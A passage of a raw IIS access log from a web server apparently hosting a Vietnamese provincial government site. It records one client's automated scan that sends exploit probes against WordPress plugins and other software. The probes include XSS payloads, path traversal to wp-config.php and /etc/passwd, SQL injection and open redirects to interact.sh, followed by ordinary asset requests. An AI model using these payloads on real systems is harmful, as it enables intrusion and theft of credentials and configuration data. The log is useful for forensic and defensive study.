Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 203 2023-10-15 22:26:25 103.153.214.94 GET /wp-content/plugins/mstore-api/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-15 22:26:34 103.153.214.94 POST /wp-admin/admin-ajax.php action=action_name 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 209 2023-10-15 22:26:36 103.153.214.94 GET /wp-content/plugins/nextgen-gallery/nggallery.php test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200 2023-10-15 22:29:09 103.153.214.94 GET /wp-content/themes/oxygen-theme/download.php file=../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207 2023-10-15 22:31:54 103.153.214.94 GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 208 2023-10-15 22:32:25 103.153.214.94 GET /wp-content/themes/prostore/go.php https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 22:32:30 103.153.214.94 GET / ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 212 2023-10-15 22:34:52 103.153.214.94 GET /wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(1);</script> tested=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 208 2023-10-15 22:34:58 103.153.214.94 GET / aiowpsec_do_log_out=1&after_logout=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 211 2023-10-15 22:36:33 103.153.214.94 GET /wp-content/plugins/simple-fields/simple_fields.php wp_abspath=/etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206 2023-10-15 22:36:43 103.153.214.94 GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205 2023-10-15 22:37:50 103.153.214.94 GET /wp-content/plugins/socialfit/popup.php service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205 2023-10-15 22:39:30 103.153.214.94 GET /wp-content/plugins/super-forms/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 204 2023-10-15 22:40:13 103.153.214.94 GET /wp-includes/sym404/root/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 211 2023-10-15 22:41:23 103.153.214.94 GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php href=../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 206 2023-10-15 22:42:02 103.153.214.94 GET / wptouch_switch=desktop&redirect=http://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206 2023-10-15 22:44:53 103.153.214.94 GET /wp-content/plugins/tutor/views/pages/instructors.php sub_page=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 205 2023-10-15 22:45:01 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 205 2023-10-15 22:45:04 103.153.214.94 GET /wp-content/uploads/data.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 244 2023-10-15 22:47:34 103.153.214.94 GET / wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 210 2023-10-15 22:50:51 103.153.214.94 GET /wp-admin/admin-post.php alg_wc_pif_download_file=../../../../../wp-config.php 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 204 2023-10-15 22:51:00 103.153.214.94 GET /my-account/ alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 22:51:02 103.153.214.94 GET / alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 22:51:59 103.153.214.94 GET /wp-content/uploads/pdf-invoices/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 203 2023-10-15 22:53:21 103.153.214.94 GET /wp-content/uploads/wpdm-cache/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 209 2023-10-15 22:54:16 103.153.214.94 GET /wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207 2023-10-15 22:54:33 103.153.214.94 GET /wp-login.php wp_lang=en_US%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 22:55:00 103.153.214.94 GET /wp-content/plugins/wpmudev-updates/keys/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 203 2023-10-15 22:55:31 103.153.214.94 GET / wptouch_switch=desktop&redirect=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207 2023-10-15 22:56:43 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 209 2023-10-15 22:57:47 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 22:58:37 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203 2023-10-15 23:00:34 103.153.214.94 GET /yyoa/common/js/menu/test.jsp doType=101&S1=(SELECT%20md5(999999999)) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 206 2023-10-15 23:01:45 103.153.214.94 GET /Export_Log /etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 210 2023-10-15 23:02:16 103.153.214.94 GET /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php redirection=3¶m=<img/src=x%20onerror=alert(1)> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207 2023-10-15 23:02:18 103.153.214.94 GET /tests/Zend/Http/Client/_files/testRedirections.php redirection=3¶m=<img/src=x%20onerror=alert(document.domain)> 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 211 2023-10-15 23:02:53 103.153.214.94 POST /ztp/cgi-bin/handler - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 202 2023-10-15 23:03:52 103.153.214.94 GET /plugins/webuploader/js/webconfig.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 202 2023-10-15 23:03:56 103.153.214.94 POST /plugins/ueditor/php/controller.php action=catchimage&upfolder=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 202 2023-10-15 23:04:10 103.153.214.94 GET /plugins/template/login.php backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-15 23:30:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-15 23:30:45 103.153.214.94 GET / - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 831 2023-10-15 23:30:45 103.153.214.94 GET /runtime-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 291 2023-10-15 23:30:46 103.153.214.94 GET /polyfills-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 892 2023-10-15 23:30:48 103.153.214.94 GET /styles-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 636 2023-10-15 23:30:49 103.153.214.94 GET /vendor-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 718 2023-10-15 23:30:51 103.153.214.94 GET /main-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 307 2023-10-15 23:30:53 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1303 2023-10-15 23:31:00 103.153.214.94 GET /data-table.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 288 2023-10-15 23:31:00 103.153.214.94 GET /data-table.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 285 2023-10-15 23:31:00 103.153.214.94 GET /data-table.woff - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:01 103.153.214.94 GET /data-table.ttf - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:01 103.153.214.94 GET /data-table.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:01 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:03 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 285 2023-10-15 23:31:03 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:03 103.153.214.94 GET /ui-icons_222222_256x240.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:04 103.153.214.94 GET /Avenir_Next_W00_400.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:04 103.153.214.94 GET /Avenir_Next_W00_400.woff2 - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 286 2023-10-15 23:31:05 103.153.214.94 GET /Avenir_Next_W00_400.woff - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 287 2023-10-15 23:31:05 103.153.214.94 GET /Avenir_Next_W00_400.ttf - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 290 2023-10-15 23:31:06 103.153.214.94 GET /Avenir_Next_W00_400.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 292 2023-10-15 23:31:06 103.153.214.94 GET /Avenir_Next_W00_Italic_400.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 285 2023-10-15 23:31:06 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff2 - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:07 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 286 2023-10-15 23:31:07 103.153.214.94 GET /Avenir_Next_W00_Italic_400.ttf - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 290 2023-10-15 23:31:07 103.153.214.94 GET /Avenir_Next_W00_Italic_400.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 299 2023-10-15 23:31:08 103.153.214.94 GET /Avenir_Next_W00_600.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:08 103.153.214.94 GET /Avenir_Next_W00_600.woff2 - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:08 103.153.214.94 GET /Avenir_Next_W00_600.woff - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:10 103.153.214.94 GET /Avenir_Next_W00_600.ttf - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 290 2023-10-15 23:31:10 103.153.214.94 GET /Avenir_Next_W00_600.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 295 2023-10-15 23:31:11 103.153.214.94 GET /Avenir_Next_W00_Italic_600.eot - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 288 2023-10-15 23:31:12 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff2 - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 285 2023-10-15 23:31:12 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 287 2023-10-15 23:31:12 103.153.214.94 GET /Avenir_Next_W00_Italic_600.ttf - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 292 2023-10-15 23:31:13 103.153.214.94 GET /Avenir_Next_W00_Italic_600.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 295 2023-10-15 23:31:13 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 285 2023-10-15 23:31:15 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 286 2023-10-15 23:31:16 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 290 2023-10-15 23:31:16 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:17 103.153.214.94 GET /loading-throb.gif - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:17 103.153.214.94 GET /search.svg - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:17 103.153.214.94 GET /helpIcon.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:19 103.153.214.94 GET /search32.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:19 103.153.214.94 GET /transparent-bg.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:19 103.153.214.94 GET /slider-handle.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:20 103.153.214.94 GET /raster-symbology-editor-stretch-type-min-max.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 284 2023-10-15 23:31:20 103.153.214.94 GET /raster-symbology-editor-stretch-type-none.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:20 103.153.214.94 GET /raster-symbology-editor-stretch-type-standard-deviation.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 282 2023-10-15 23:31:21 103.153.214.94 GET /raster-symbology-editor-stretch-type-percent-clip.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:21 103.153.214.94 GET /raster-symbology-editor-band-combination-natural-color.png - 443 - 208.115.225.117 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 283 2023-10-15 23:31:22 103.153.214.94 GET /raster-symbology-editor-band-combination-land-water.png - 443 - 208.115.225.117 